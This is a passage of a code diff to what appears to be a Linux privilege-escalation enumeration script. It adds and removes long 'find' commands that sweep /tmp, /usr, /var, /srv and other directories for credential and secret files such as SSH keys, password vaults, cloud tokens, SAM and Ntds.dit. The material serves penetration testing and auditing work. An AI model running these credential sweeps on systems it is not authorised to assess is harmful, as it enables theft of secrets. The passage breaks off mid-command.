-name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SNAP=`eval_bckgrd "find /snap -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SRV=`eval_bckgrd "find /srv -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SYS=`eval_bckgrd "find /sys -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_TMP=`eval_bckgrd "find /tmp -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"agent*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_USR=`eval_bckgrd "find /usr -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"ssh*config\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_VAR=`eval_bckgrd "find /var -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_TMP=`eval_bckgrd "find /tmp -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o 